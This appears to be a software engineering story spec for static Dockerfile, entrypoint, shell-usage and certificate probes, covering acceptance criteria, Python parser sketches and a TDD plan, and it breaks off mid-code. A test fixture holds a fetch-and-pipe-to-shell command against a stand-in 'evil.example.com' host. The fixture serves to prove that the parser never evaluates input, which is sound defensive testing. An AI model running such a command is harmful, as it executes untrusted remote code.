Story S5-03 — Dockerfile + Entrypoint + ShellUsage + Certificate marker probes
Step: Step 5 — Ship Layer C (runtime + container) probes
Status: Done — GREEN 2026-05-17 (commit pending)
Effort: M
Depends on: S5-02 (the slice schema for runtime_trace is the upstream ShellUsageProbe reads; also wires the disk-anchored raw artifact <repo>/.codegenie/context/raw/runtime_trace.json that ShellUsageProbe/CertificateProbe read via read_raw_slices per S4-01), S4-01 (read_raw_slices(raw_dir) helper at src/codegenie/output/paths.py — the only Phase-2-blessed sibling-slice access path; ctx.sibling_slices does not exist on the frozen ProbeContext), S3-03 (writer chokepoint), S1-08 (@register_probe(heaviness=, runs_last=) — does NOT accept requires=; requires is a Probe class attribute per Phase 0 localv2.md §4 + 02-ADR-0003)
ADRs honored: 02-ADR-0001 (no new binary needed beyond docker/strace; these probes are file-marker driven), 02-ADR-0003 (registry-side scheduling annotations only; requires stays on the contract — @register_probe(...) accepts only heaviness + runs_last), 02-ADR-0007 (no Plugin Loader — probes are in-tree)
Validation notes
Validated: 2026-05-16
Verdict: HARDENED
Findings addressed: 11 total — 4 blocks, 6 hardens, 1 nit
Changes applied:
- Header Depends on: + ADRs honored: corrected — surfaced the sibling-slice mechanism (read_raw_slices from S4-01) and 02-ADR-0003's requires-is-class-attribute decision — Consistency block C1, C2
- AC for ShellUsageProbe decorator fixed — was @register_probe(...requires=[...]); corrected to class-attribute requires (matches S5-02 + S4-01 precedent and 02-ADR-0003 Option D) — Consistency block C1
- AC for EntrypointProbe.requires added — story said EntrypointProbe reads dockerfile slice but never declared requires — Consistency block C3
- AC-V1, AC-V2 added — sibling-slice access is disk-anchored via read_raw_slices(raw_dir(repo.root)) and every sibling-slice reader degrades to confidence="unavailable" when the upstream .codegenie/context/raw/<name>.json is absent (no race-induced exception) — Consistency block C4 + Coverage harden K1
- AC-V3 added — requires is metadata-only in Phase 2 (the coordinator does NOT topo-sort by it; S1-08's heaviness sort is the only ordering primitive); intra-heaviness="light" ordering between dockerfile/entrypoint/shell_usage/certificate is not guaranteed; the absence-handling discipline (AC-V2) is what makes Layer C deterministic — Consistency block C4
- AC-V4 … AC-V11 added — Dockerfile parser edge cases (line continuations, # comments, case-insensitive directives, ENTRYPOINT/CMD JSON-array vs shell-form parsing, ENV/LABEL multi-pair on one line, HEALTHCHECK NONE vs HEALTHCHECK CMD, Containerfile synonym, COPY --from=<missing-stage> typed signal, ARG directive captured) — Coverage harden K2–K9
- Test 7 reworded as parametrized per-directive + property-based round-trip Test 15 added (Hypothesis-driven parser stability) — Test-Quality harden T1, T2
- Mutation-suite test (Test 16) added — a deliberately weakened parser (skip-RUN, lowercase-only directive table, eager ${VAR} expansion) must fail at least one named test — Test-Quality harden T3
- LOC budget AC tightened — was "≤ 100 LOC excluding docstrings; raw < 150 with 50-line slack"; replaced with a clean per-module non-blank non-comment line ceiling (cloc or equivalent), no slack — Test-Quality nit N1
- Static-evidence schema tightened to typed Pydantic models (StaticShellEvidence + RunCommandEntry) — Design-Patterns harden D1
- Notes for the implementer — added two paragraphs: (a) reuse the read_raw_slices helper from S4-01 (rule-of-three: B2 + ShellUsage + Entrypoint + Certificate; the helper IS the kernel — no per-probe disk-IO duplication); (b) tagged-union Directive sum type opportunity for _tokenize_dockerfile_line (exhaustive match + assert_never = Open/Closed via the compiler) — promoted from nit to a documented opportunity, not an AC, per Rule 2 (only the _tokenize_dockerfile_line extract is mandated; the discriminated-union form is the implementer's call within the LOC budget) — Design-Patterns harden D2, D3
Conflict resolutions:
- Design-Patterns initially proposed mandating a Directive tagged-union sum type as an AC. Demoted to Notes for the implementer per Rule 2 (Simplicity First) — the LOC budget is the harder constraint and one of the two shapes (tuple[Literal[...], dict] vs Directive = FromDirective | RunDirective | …) is fine.
- Coverage proposed an AC asserting "two concurrent gathers of the same repo produce byte-identical Layer C slices". Resolved against — Phase 2 doesn't pin Layer C race semantics globally; AC-V2 (graceful absent-upstream) is the per-probe contract; the cross-probe coordinator-race is S7-04 (Phase 5) territory, not S5-03.
Full audit log: docs/phases/02-context-gather-layers-b-g/stories/_validation/S5-03-layer-c-marker-probes.md
Context
The remaining Layer C probes (localv2.md §5.3 C1, C5–C7) are marker-and-parse: each reads Dockerfile (and possibly the runtime_trace slice) and emits a typed slice. None of them invokes a subprocess; none of them needs an ALLOWED_BINARIES addition; each is ≤ 100 LOC. They depend on S5-02 only because ShellUsageProbe reads RuntimeTraceProbe's shell_invocations count (the "shell usage" classification combines static Dockerfile evidence with the runtime trace's dynamic evidence; see localv2.md §5.3 C5).
The Dockerfile parser is line-by-line with no shell evaluation. We do not run RUN commands; we do not expand ${VAR}; we do not call out to BuildKit's parser. The shape we emit (FROM chain, USER, EXPOSE, HEALTHCHECK, CMD/ENTRYPOINT literals) is what Phase 3's distroless planner reads — sufficient for the planner without inheriting the supply-chain attack surface of a real Dockerfile evaluator. localv2.md §5.3 C1 names the dockerfile Python library as the reference; we adopt it only if it can be vendored without shell evaluation. If not, the parser is a hand-rolled state machine over the line forms named in localv2.md §5.3 C1.
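The line-by-line, no-evaluation approach can be sketched as follows. This is a minimal illustration, not the story's implementation: the names `logical_lines` and `tokenize` are hypothetical, the return type is a plain tuple rather than the story's `Directive`, and the `# syntax=...` parser directive is simply skipped along with other comments.

```python
from __future__ import annotations

from typing import Iterator

# Directive names as listed in this story (assumed complete for the sketch).
KNOWN_DIRECTIVES = frozenset({
    "FROM", "RUN", "COPY", "ADD", "USER", "EXPOSE", "HEALTHCHECK", "CMD",
    "ENTRYPOINT", "WORKDIR", "ENV", "LABEL", "ARG", "ONBUILD", "STOPSIGNAL",
    "SHELL", "VOLUME", "MAINTAINER",
})


def logical_lines(text: str) -> Iterator[str]:
    """Join backslash-continued physical lines; skip blank and comment lines."""
    pending: list[str] = []
    for raw in text.splitlines():
        stripped = raw.strip()
        if not stripped or stripped.startswith("#"):
            continue  # comments may sit inside a continued RUN block
        if stripped.endswith("\\"):
            pending.append(stripped[:-1].rstrip())
            continue
        pending.append(stripped)
        yield "\n".join(pending)  # keep "\n" markers so readers can re-split
        pending = []
    if pending:  # file ended on a dangling continuation
        yield "\n".join(pending)


def tokenize(line: str) -> tuple[str, str] | None:
    """Split a logical line into (DIRECTIVE, literal_rest) without evaluating it."""
    parts = line.split(None, 1)
    if not parts:
        return None
    name = parts[0].upper()  # directives are case-insensitive
    if name not in KNOWN_DIRECTIVES:
        return None
    rest = parts[1] if len(parts) > 1 else ""
    return name, rest
```

Nothing here touches a shell, the environment, or the network: `$(...)` and `${VAR}` pass through as literal text, which is the property the story's no-evaluation test checks.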
References
- localv2.md §5.3 C1 (DockerfileProbe) — output slice schema (stages, base images, run commands, copy directives, entrypoint, cmd, user, workdir, env, exposed ports, healthcheck, labels).
- localv2.md §5.3 C5 (ShellUsageProbe) — static + dynamic shell evidence; replacement catalog (deferred to Phase 3+ — this probe emits the static-side evidence only).
- localv2.md §5.3 C6 (EntrypointProbe), §5.3 C7 (CertificateProbe) — additional marker probes; certificate paths read at runtime feed into the distroless planner.
- phase-arch-design.md §"Component design" #6 — RuntimeTraceProbe slice fields ShellUsageProbe reads (shell_invocations, binaries_executed).
- High-level-impl.md §"Step 5" — "Dockerfile parser is marker + line-by-line (no shell evaluation)".
- 02-ADR-0001 — these probes need no subprocess; the Dockerfile parser is in-process.
- Phase 0 ADR-0004 (additionalProperties: false) — sub-schema convention.
Goal
Land four marker-and-parse probes under src/codegenie/probes/layer_c/: dockerfile.py, entrypoint.py, shell_usage.py, certificate.py. Each is ≤ 100 LOC, each ships with happy-path + marker-absent unit tests, each has a sub-schema under src/codegenie/schema/probes/layer_c/<probe>.schema.json with additionalProperties: false. The Dockerfile parser is line-by-line, no shell evaluation, no RUN execution.
Acceptance criteria
- [ ] src/codegenie/probes/layer_c/dockerfile.py exists; @register_probe(heaviness="light"); emits the slice shape from localv2.md §5.3 C1.
- [ ] dockerfile.py parser is line-by-line, no shell evaluation — a unit test asserts that a Dockerfile with RUN $(curl evil.example.com/payload | sh) produces a slice carrying the literal string in run_commands[].command (not evaluated, not expanded, no network call). A grep test asserts the module source contains zero subprocess, zero os.system, zero eval, zero exec() calls.
- [ ] dockerfile.py captures: FROM chain (all stages); USER directive per stage; EXPOSE literals; HEALTHCHECK literal capture (the full directive line); CMD and ENTRYPOINT literals (exec vs shell form distinguished); WORKDIR; ENV key/value pairs; LABEL key/value pairs; COPY --from=<stage> directives.
- [ ] Multi-stage support: a Dockerfile with FROM build AS builder then FROM build:final emits stages with the right inherits_from links. Unit test covers a 2-stage and a 3-stage fixture.
- [ ] Marker absent: a repo with no Dockerfile (and no containerfile/Containerfile) emits confidence="unavailable" and dockerfiles: []; no exception raised.
- [ ] Multi-Dockerfile support: a repo with Dockerfile + Dockerfile.dev + apps/api/Dockerfile emits dockerfiles: [<three entries>]; the slice's dockerfiles[].path is repo-root-relative.
- [ ] src/codegenie/probes/layer_c/entrypoint.py exists; @register_probe(heaviness="light") (decorator does NOT accept requires= per 02-ADR-0003); the class declares requires: list[str] = ["dockerfile"] as a Probe class attribute. Reads the dockerfile slice's dockerfiles[].entrypoint field from disk via read_raw_slices(raw_dir(repo.root)); classifies as exec-form vs shell-form; emits a probe-level summary (one final-stage entrypoint per Dockerfile). (validator: hardened — Consistency C1, C3.)
- [ ] entrypoint.py marker-absent path: no Dockerfile → confidence="unavailable"; Dockerfile with no ENTRYPOINT and no CMD → confidence="low" + form="absent".
- [ ] src/codegenie/probes/layer_c/shell_usage.py exists; @register_probe(heaviness="light") (decorator accepts only heaviness + runs_last per 02-ADR-0003 — do NOT pass requires=); the class declares requires: list[str] = ["dockerfile", "runtime_trace"] as a Probe class attribute per Phase 0 localv2.md §4 and the precedent set by S5-02 (RuntimeTraceProbe.requires == []) and S4-01 (IndexHealthProbe.requires == []). Reads the dockerfile slice and the runtime_trace slice from disk via read_raw_slices(raw_dir(repo.root)) (the helper S4-01 introduced — ctx.sibling_slices does NOT exist on the frozen ProbeContext). Emits static evidence only for Phase 2 (the dynamic-evidence-and-replacement-catalog flow is deferred — see "Out of scope"). Static evidence (typed via Pydantic StaticShellEvidence model): final_stage_entrypoint_form, final_stage_cmd_form, final_stage_run_commands: list[RunCommandEntry] (build_time vs runtime classification based on stage). (validator: hardened — Consistency C1 + Design-Patterns D1.)
- [ ] shell_usage.py reads runtime_trace.shell_invocations and emits dynamic_shell_invocation_count: int | None — None when runtime_trace.confidence == "unavailable"; the integer otherwise.
- [ ] src/codegenie/probes/layer_c/certificate.py exists; @register_probe(heaviness="light") (decorator does not accept requires= per 02-ADR-0003); the class declares requires: list[str] = ["runtime_trace"] as a Probe class attribute. Reads runtime_trace.cert_paths_read from disk via read_raw_slices(raw_dir(repo.root)) (S4-01 helper; ctx.sibling_slices does NOT exist). Emits the list + a typed certificate_source: Literal["ca-certificates", "vendored", "absent", "unknown"] classification derived from the path prefixes (/etc/ssl/certs/ca-certificates.crt → "ca-certificates"; /app/vendor/certs/ prefix → "vendored"; empty list → "absent"). (validator: hardened — Consistency C1.)
- [ ] Every probe has a sub-schema under src/codegenie/schema/probes/layer_c/<name>.schema.json with additionalProperties: false at the root and at every nested object (Phase 1 ADR-0004 convention). A sub-schema rejection test per probe presents a slice with one extra field and asserts validation rejects it.
- [ ] All four probes' slices flow through the writer chokepoint as RedactedSlice (S3-03).
- [ ] mypy --strict clean.
- [ ] Each module is ≤ 100 LOC (excluding docstrings + imports); enforce via wc -l smoke test that asserts < 150 raw lines (allow 50-line slack for docstrings). Superseded by AC-V12 below — keep this bullet for diff continuity; AC-V12 is the binding contract.
- [ ] forbidden-patterns stays green — no model_construct; no subprocess; no eval/exec.
- [ ] AC-V1 (sibling-slice disk-anchored access). ShellUsageProbe, EntrypointProbe, and CertificateProbe read upstream slice data only from <repo>/.codegenie/context/raw/<name>.json via the read_raw_slices(raw_dir(repo.root)) helper that S4-01 introduced at src/codegenie/output/paths.py (or its equivalent module path; the executor MUST reuse this helper, not re-implement disk IO). Verified by a structural test that imports each of the three probe modules and asserts (a) read_raw_slices is the only inbound import from codegenie.output.paths and (b) zero usages of ctx.sibling_slices (which doesn't exist on the frozen ProbeContext — failure mode caught: a future contributor inventing a phantom field). (validator: added — Consistency C4 + Design-Patterns D2; rule-of-three: B2 + 3 Layer-C readers = 4th, kernel reuse mandatory.)
- [ ] AC-V2 (upstream-slice absent → typed confidence="unavailable", never raises). Each sibling-slice reader (ShellUsageProbe, EntrypointProbe, CertificateProbe) emits confidence="unavailable" with an empty/null payload when its declared upstream raw artifact is absent from disk at run() time (e.g., <repo>/.codegenie/context/raw/dockerfile.json not yet written). The probe MUST NOT raise. Verified per probe by a unit test that runs the probe against a fixture where the upstream raw artifact is intentionally missing; assert the typed-error path (no traceback, no exception type leaks into the slice). Mirrors IndexHealthProbe.IndexerError("upstream_<name>_unavailable") discipline (phase-arch-design.md §"Component design" #1). (validator: added — Consistency C4 + Coverage K1; race-safety guarantee.)
- [ ] AC-V3 (requires is metadata-only in Phase 2). A documentation-level assertion in each module's docstring (and an audit test that greps for the docstring text) records: "The Phase 2 coordinator does NOT topologically sort by requires (02-ADR-0003 Option D adopted; requires is the contract-side documentation channel only). Dispatch order within heaviness=\"light\" is concurrent under the single asyncio.Semaphore. AC-V2's graceful-absent-upstream behavior is what makes this probe correct under arbitrary scheduling." Verified by a test that greps each of the three module sources for the literal substring requires is metadata-only. (validator: added — Consistency C4; makes the load-bearing scheduling invariant grep-able for the next contributor.)
- [ ] AC-V4 (# comments + line continuations). The Dockerfile parser ignores leading-# comment lines (excluding # syntax=... directive which is captured separately as parser_directive) and concatenates \-continued physical lines into a single logical directive before tokenization. Unit tests: (a) fixture with # comments inside RUN blocks; (b) fixture with RUN apt-get update \\\n && apt-get install -y foo — assert the captured run_commands[0].command contains both halves; (c) fixture with # syntax=docker/dockerfile:1.4 first line — assert it appears as parser_directive and is NOT counted as a FROM predecessor. (validator: added — Coverage K2.)
- [ ] AC-V5 (case-insensitive directives). The parser accepts directives in any case (FROM, from, From) per Docker's reference. Parametrized unit test: same fixture content with FROM/from/From produces identical slices. (validator: added — Coverage K3.)
- [ ] AC-V6 (ENTRYPOINT/CMD JSON-array vs shell-form distinguished). Parser distinguishes the two forms: ENTRYPOINT ["sh", "-c", "echo hi"] → form="exec", argv=["sh","-c","echo hi"]; ENTRYPOINT echo hi → form="shell", command="echo hi". Same for CMD. Unit tests cover both forms for each directive, plus a malformed JSON array (ENTRYPOINT ["sh", "-c") → typed signal form="malformed" + the literal capture preserved (parser does not silently coerce). (validator: added — Coverage K4.)
- [ ] AC-V7 (ENV/LABEL multi-pair on one line). Parser handles ENV A=1 B=2 C=3 → env: {A: "1", B: "2", C: "3"} and the equivalent for LABEL; also handles the legacy single-pair-no-equals form ENV A 1 (per Docker reference, deprecated but legal). Unit tests cover both. Multi-line continuation with \\ is tokenized first (per AC-V4) so multi-pair on the resulting joined line works the same. (validator: added — Coverage K5.)
- [ ] AC-V8 (HEALTHCHECK NONE vs HEALTHCHECK CMD). Parser distinguishes the two forms: HEALTHCHECK NONE → healthcheck: {kind: "none"}; HEALTHCHECK --interval=30s CMD curl -f http://... → healthcheck: {kind: "cmd", options: {interval: "30s"}, cmd: "curl -f http://..."}. Unit tests cover both. (validator: added — Coverage K6.)
- [ ] AC-V9 (Containerfile synonym positive test). A fixture repo with Containerfile (no Dockerfile) is parsed identically to one with Dockerfile; the slice's dockerfiles[0].path equals Containerfile (preserved literally, repo-root-relative). Story already names this synonym in the marker-absent AC; AC-V9 adds the positive test. (validator: added — Coverage K7.)
- [ ] AC-V10 (COPY --from=<missing-stage> typed signal). When COPY --from=builder references a stage name builder that was never declared (no FROM ... AS builder), the slice captures the directive literally AND emits a typed structural flag copy_directives[i].from_stage_resolved: bool = False. Resolved cross-stage references set the flag True. Unit test covers both. Rationale: Phase 3's distroless planner reads this signal to surface a parse-time inconsistency without re-implementing the resolution. (validator: added — Coverage K8.)
- [ ] AC-V11 (ARG directive captured). ARG directives (ARG NODE_VERSION=20, ARG NODE_VERSION without default) are captured per stage in args: list[ArgDirective] with name, default: str | None, and before_first_from: bool (the special "global ARG" case Docker uses for parameterizing FROM). Unit test covers both forms + a global ARG preceding FROM ${NODE_VERSION}-alpine — assert the global ARG is recorded and the ${NODE_VERSION} reference in FROM is captured literally (no expansion). (validator: added — Coverage K9; closes the Implementation-outline-named-but-AC-missing gap.)
- [ ] AC-V12 (LOC budget — clean, no slack). Each of the four modules has ≤ 100 source lines, counted by cloc (or equivalent: lines that are not blank and not comment-only). Docstrings count as comments and are excluded; imports count as source. No "raw < 150 with 50-line slack" — the budget is the budget. Smoke test calls cloc --json src/codegenie/probes/layer_c/<name>.py and asserts the code count ≤ 100 per file. (validator: hardened — replaced the loose smoke; Test-Quality N1.)
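As an illustration of AC-V6, the exec/shell/malformed distinction might look like the sketch below. The `CommandForm` dataclass and `classify_command` function are hypothetical names (the story types its slices with Pydantic; a stdlib dataclass is used here only to keep the sketch dependency-free), and treating any text that starts with `[` as an attempted JSON array is an assumption of this sketch.

```python
from __future__ import annotations

import json
from dataclasses import dataclass
from typing import Literal

Form = Literal["exec", "shell", "malformed", "absent"]


@dataclass(frozen=True)
class CommandForm:
    form: Form
    literal: str                          # always the text exactly as captured
    argv: tuple[str, ...] | None = None   # set only for exec form
    command: str | None = None            # set only for shell form


def classify_command(literal: str | None) -> CommandForm:
    """Classify an ENTRYPOINT/CMD literal without evaluating it."""
    if literal is None or not literal.strip():
        return CommandForm(form="absent", literal="")
    text = literal.strip()
    if text.startswith("["):
        try:
            parsed = json.loads(text)
        except json.JSONDecodeError:
            # Keep the literal and flag it; do not coerce to shell form.
            return CommandForm(form="malformed", literal=text)
        if isinstance(parsed, list) and all(isinstance(a, str) for a in parsed):
            return CommandForm(form="exec", literal=text, argv=tuple(parsed))
        return CommandForm(form="malformed", literal=text)
    return CommandForm(form="shell", literal=text, command=text)
```

The same function serves both directives, so one table-driven test can cover ENTRYPOINT and CMD for all four forms.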
Implementation outline
- dockerfile.py — hand-roll a line-by-line parser. Tokenize each line by leading directive (FROM, RUN, COPY, ADD, USER, EXPOSE, HEALTHCHECK, CMD, ENTRYPOINT, WORKDIR, ENV, LABEL, ARG, ONBUILD, STOPSIGNAL, SHELL, VOLUME, MAINTAINER (deprecated, captured anyway)). Pydantic model DockerfileSlice with dockerfiles: list[ParsedDockerfile]. Multi-line RUN with \ continuation is concatenated (preserve \n markers in the captured string so a downstream reader can split). Never evaluate — capture literal strings only.
- entrypoint.py — reads dockerfile slice from disk via read_raw_slices(raw_dir(repo.root)) (the S4-01 helper; ctx.sibling_slices does NOT exist); classification logic is pure. The disk read is the only I/O. Class attribute requires: list[str] = ["dockerfile"] is metadata-only (02-ADR-0003 — coordinator does not topo-sort by it); AC-V2's absent-upstream handling is what makes correctness independent of dispatch order.
- shell_usage.py — reads dockerfile + runtime_trace slices from disk via read_raw_slices(...) (same helper). Static classification (final-stage RUN commands typed as RunCommandEntry, entrypoint form). Class attribute requires: list[str] = ["dockerfile", "runtime_trace"] is metadata-only. The replacement catalog (localv2.md §5.3 C5) is deferred — emit static evidence only, typed via StaticShellEvidence Pydantic model (extra="forbid", frozen=True).
- certificate.py — reads runtime_trace.cert_paths_read from disk via read_raw_slices(...); classification by path prefix. Class attribute requires: list[str] = ["runtime_trace"] is metadata-only.
- Sub-schemas — four <name>.schema.json files under src/codegenie/schema/probes/layer_c/; each with additionalProperties: false at every object node; each referenced by src/codegenie/schema/repo-context.schema.json oneOf/properties (incremental — match how S4-07 wired Layer B sub-schemas).
- Tests — happy-path + marker-absent + sub-schema rejection per probe.
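The path-prefix classification that certificate.py performs could be sketched as below. The function name is hypothetical, and the precedence when a trace contains both a system bundle and a vendored path is an assumption of this sketch; the story does not specify it.

```python
from __future__ import annotations

from typing import Literal

CertificateSource = Literal["ca-certificates", "vendored", "absent", "unknown"]

# Path constants taken from the acceptance criteria.
SYSTEM_BUNDLE = "/etc/ssl/certs/ca-certificates.crt"
VENDORED_PREFIX = "/app/vendor/certs/"


def classify_certificate_source(cert_paths_read: list[str]) -> CertificateSource:
    """Map the certificate paths read at runtime onto one of four buckets."""
    if not cert_paths_read:
        return "absent"
    # Assumption: the system bundle wins when both kinds of path are present.
    if SYSTEM_BUNDLE in cert_paths_read:
        return "ca-certificates"
    if any(path.startswith(VENDORED_PREFIX) for path in cert_paths_read):
        return "vendored"
    return "unknown"
```

Because the function is pure, the probe's run() only has to read the upstream slice and pass the list through.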
TDD plan — red / green / refactor
Red:
1. test_dockerfile_probe_register_light — registry introspection asserts heaviness == "light".
2. test_dockerfile_parser_no_shell_evaluation — feed a fixture Dockerfile containing RUN $(curl evil.example.com | sh); assert the slice's run_commands[0].command == "$(curl evil.example.com | sh)" literally; assert no network call (mock-spy on socket import — already banned by fence).
3. test_dockerfile_parser_no_subprocess_in_source — grep the source: zero subprocess, zero os.system, zero eval(, zero exec(.
4. test_dockerfile_multi_stage_2 and test_dockerfile_multi_stage_3 — fixture Dockerfiles with 2 and 3 stages; assert stage names, inherits_from, base images extracted correctly.
5. test_dockerfile_marker_absent — repo snapshot with no Dockerfile; assert confidence="unavailable", dockerfiles == [].
6. test_dockerfile_multiple_files — fixture with Dockerfile, Dockerfile.dev, apps/api/Dockerfile; assert three entries with repo-root-relative paths.
7. test_dockerfile_directive_coverage — parametrized per directive (FROM, RUN, COPY, ADD, USER, EXPOSE, HEALTHCHECK, CMD, ENTRYPOINT, WORKDIR, ENV, LABEL, ARG, ONBUILD, STOPSIGNAL, SHELL, VOLUME, MAINTAINER): each parametrization feeds the smallest fixture exercising that directive and asserts (a) the captured field on the slice matches the expected value and (b) every other captured field is at its empty/default state (no spurious capture). Mutation-resistance: a parser that returns the same dict for every directive would fail every parametrization except one. (validator: hardened from "single fixture with one of each" — failure was not localised when one of 18 directives broke; Test-Quality T1.)
8. test_entrypoint_probe_exec_form and test_entrypoint_probe_shell_form — table-driven over ["sh", "-c", "echo hi"] vs "echo hi".
9. test_entrypoint_absent — Dockerfile with no ENTRYPOINT/CMD → form="absent", confidence="low".
10. test_shell_usage_static_only — feed fixture dockerfile slice + runtime_trace slice; assert final_stage_run_commands reflects only RUN lines from the final stage; build_time vs runtime classification matches.
11. test_shell_usage_dynamic_count_when_runtime_trace_unavailable — runtime_trace.confidence == "unavailable" → dynamic_shell_invocation_count is None.
12. test_shell_usage_dynamic_count_present — runtime_trace.shell_invocations == 3 → dynamic_shell_invocation_count == 3.
13. test_certificate_classification — table over path-prefix → classification: /etc/ssl/certs/ca-certificates.crt → "ca-certificates"; /app/vendor/certs/* → "vendored"; [] → "absent"; novel path → "unknown".
14. Per-probe sub-schema rejection: present a slice JSON with one extra field; assert jsonschema.validate raises.
15. test_dockerfile_parser_property_roundtrip (property-based via hypothesis). Generate arbitrary syntactically-valid Dockerfile fixtures from a Hypothesis grammar (one stage, then multi-stage; pick from the 18 known directives; randomize arg shape, quoting, line continuations, case, comment interleaving). For each generated input, assert the invariant set: (a) parse(text) does not raise; (b) every captured directive appears in the input text (capture-soundness); (c) re-rendering the slice into a canonical Dockerfile form parses to a slice structurally equal to the original (round-trip identity, modulo whitespace); (d) zero shell evaluation evidence (no socket import touched, no subprocess spawned — pytest-subprocess sentinel). Shrinker localises any off-by-one tokenization bug to a minimal counter-example. (validator: added — Test-Quality T2; property-based discipline mirrors S1-08's AC-15 hypothesis test.)
16. test_dockerfile_parser_mutation_resistance (mutation suite). A @pytest.mark.parametrize table of three intentionally-broken parser stubs lives in the test module: (a) _skip_run_directive — same parser but never captures RUN; (b) _lowercase_only_directive_table — same parser but only matches lowercase directives; (c) _eager_var_expansion — same parser but substitutes ${VAR} from os.environ. For each stub, assert that at least one of the named tests in this module FAILS when the production parser is monkey-patched to the stub (use pytest's request.node.session.testscollected indirection or simply call the stubbed parser inline and assert at-least-one named assertion would fail). This is the structural defense — guarantees the test suite is mutation-strong, not happy-path-only. (validator: added — Test-Quality T3; mirrors the SecretRedactor mutation-test discipline at phase-arch-design.md §"Component design" #4 last bullet.)
17. test_sibling_slice_absent_unavailable (per probe — three parametrizations: ShellUsageProbe, EntrypointProbe, CertificateProbe). Run each probe against a fixture where the named upstream raw artifact is intentionally absent from <repo>/.codegenie/context/raw/. Assert slice.confidence == "unavailable", the slice payload is the typed empty form (not a partial fill), and no exception propagates (use pytest.raises(...) inverse — a try/except wrapper that fails the test if any exception escapes). (validator: added — AC-V2 verification; race-safety.)
18. test_requires_metadata_only_docstring_present (per probe — three parametrizations). Each of shell_usage.py, entrypoint.py, certificate.py source contains the literal substring requires is metadata-only somewhere in the module docstring. Failure mode caught: future contributor deletes the note and silently assumes topo-sort enforcement exists. (validator: added — AC-V3 verification.)
19. test_sibling_slice_reader_is_read_raw_slices (per probe — three parametrizations). AST-walk each of the three reader modules and assert (a) exactly one import of read_raw_slices from codegenie.output.paths (or the canonical location S4-01 wired), (b) zero references to a ctx.sibling_slices attribute (regex on source — ctx\.sibling_slices must not match), (c) zero direct Path(...).read_text() / open() calls reading from .codegenie/context/raw/ (the helper is the only sanctioned path). (validator: added — AC-V1 verification + Design-Patterns D2 kernel-reuse enforcement.)
20. Edge-case parser tests (cover AC-V4 → AC-V11). Nine named tests covering the eight added ACs (AC-V7 gets separate ENV and LABEL tests): test_dockerfile_comments_and_continuations, test_dockerfile_case_insensitive_directives, test_dockerfile_entrypoint_exec_vs_shell_form, test_dockerfile_env_multipair, test_dockerfile_label_multipair_and_quoted, test_dockerfile_healthcheck_none_vs_cmd, test_dockerfile_containerfile_synonym_parses, test_dockerfile_copy_from_missing_stage_typed_signal, test_dockerfile_arg_directive_captured_global_and_per_stage. (validator: added — Coverage K2–K9 verification.)
21. test_loc_budget_per_module (smoke). For each of the four modules, invoke cloc --json (or, if cloc is not on PATH in CI, a Python-native equivalent that strips blank lines, comment-only lines, and docstring blocks) and assert the code count ≤ 100. Per-module, no slack. (validator: added — AC-V12 verification; Test-Quality N1.)
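The AST audit in Test 19 might be built around a helper like the one below. This is a sketch under assumptions: `audit_reader_source` is a hypothetical name, it works on source text so it can be run without importing the probe modules, and it flags every `open()` or `.read_text()` call, which is coarser than the story's "reading from .codegenie/context/raw/" wording.

```python
from __future__ import annotations

import ast
import re

HELPER_MODULE = "codegenie.output.paths"


def audit_reader_source(source: str) -> list[str]:
    """Return the list of violations found in one sibling-slice reader module."""
    problems: list[str] = []
    tree = ast.parse(source)

    # (a) exactly one import of read_raw_slices from the helper module
    helper_imports = sum(
        1
        for node in ast.walk(tree)
        if isinstance(node, ast.ImportFrom) and node.module == HELPER_MODULE
        for alias in node.names
        if alias.name == "read_raw_slices"
    )
    if helper_imports != 1:
        problems.append(f"expected one read_raw_slices import, found {helper_imports}")

    # (b) no reference to the phantom ProbeContext field
    if re.search(r"ctx\.sibling_slices", source):
        problems.append("references ctx.sibling_slices")

    # (c) no direct file reads (coarse: any open() or .read_text() call)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id == "open":
            problems.append("direct open() call")
        elif isinstance(func, ast.Attribute) and func.attr == "read_text":
            problems.append("direct read_text() call")
    return problems
```

A parametrized test would read each of the three module files, pass the text in, and assert the returned list is empty.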
Green:
- Implement the four parsers + the four sub-schemas.
- Declare requires as a class attribute on ShellUsageProbe, EntrypointProbe, and CertificateProbe (the Phase 0 Probe ABC defines requires: list[str] as a class field per localv2.md §4; S5-02 set the precedent with requires: list[str] = []). Do NOT pass requires= to @register_probe(...) — per 02-ADR-0003 the decorator accepts only heaviness + runs_last. requires is metadata; correctness comes from AC-V2 (graceful absent-upstream), not from coordinator topo-sort.
- Reuse read_raw_slices(raw_dir(repo.root)) from S4-01 for all sibling-slice access. Do not duplicate disk IO in any of the three probes.
- Make all red tests pass.
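The combination of a class-attribute `requires` and graceful absent-upstream handling can be illustrated with a self-contained sketch. Everything named here is a stand-in: `read_raw_slices_stub` only imitates the S4-01 helper (whose real signature and return type are not shown in this story), `CertificateProbeSketch` does not subclass the real Probe ABC, and the `"high"` confidence value is a placeholder.

```python
from __future__ import annotations

import json
from pathlib import Path
from typing import Any


def read_raw_slices_stub(raw: Path) -> dict[str, dict[str, Any]]:
    """Hypothetical stand-in for read_raw_slices: slice name -> parsed JSON."""
    if not raw.is_dir():
        return {}
    return {p.stem: json.loads(p.read_text()) for p in sorted(raw.glob("*.json"))}


class CertificateProbeSketch:
    # Class attribute, not a decorator kwarg; metadata-only in Phase 2.
    requires: list[str] = ["runtime_trace"]

    def run(self, raw: Path) -> dict[str, Any]:
        upstream = read_raw_slices_stub(raw).get("runtime_trace")
        # Absent or unavailable upstream degrades to a typed empty slice.
        if upstream is None or upstream.get("confidence") == "unavailable":
            return {"confidence": "unavailable", "cert_paths_read": []}
        return {
            "confidence": "high",  # placeholder value for the sketch
            "cert_paths_read": list(upstream.get("cert_paths_read", [])),
        }
```

Because the missing-file case returns a value instead of raising, the result is the same whether the upstream probe has not run yet or ran and reported "unavailable", which is why dispatch order does not matter.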
Refactor:
- Extract Dockerfile-line tokenization into _tokenize_dockerfile_line(line: str) -> Directive | None — pure, table-driven, easily unit-testable.
- Confirm each module is ≤ 100 LOC (excluding docstrings); refactor if not.
- Each probe's run() is a 10–20-line wrapper around the pure parser/classifier — keep the I/O thin.
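For checking the LOC budget when cloc is unavailable, a Python-native counter along these lines may be enough. It is a sketch, not a cloc replacement: `count_source_lines` is a hypothetical name, and a line beginning with `#` inside a multi-line string that is not a docstring would be miscounted as a comment.

```python
from __future__ import annotations

import ast


def count_source_lines(source: str) -> int:
    """Count lines that are not blank, not comment-only, and not docstring lines."""
    tree = ast.parse(source)
    docstring_lines: set[int] = set()
    for node in ast.walk(tree):
        if not isinstance(
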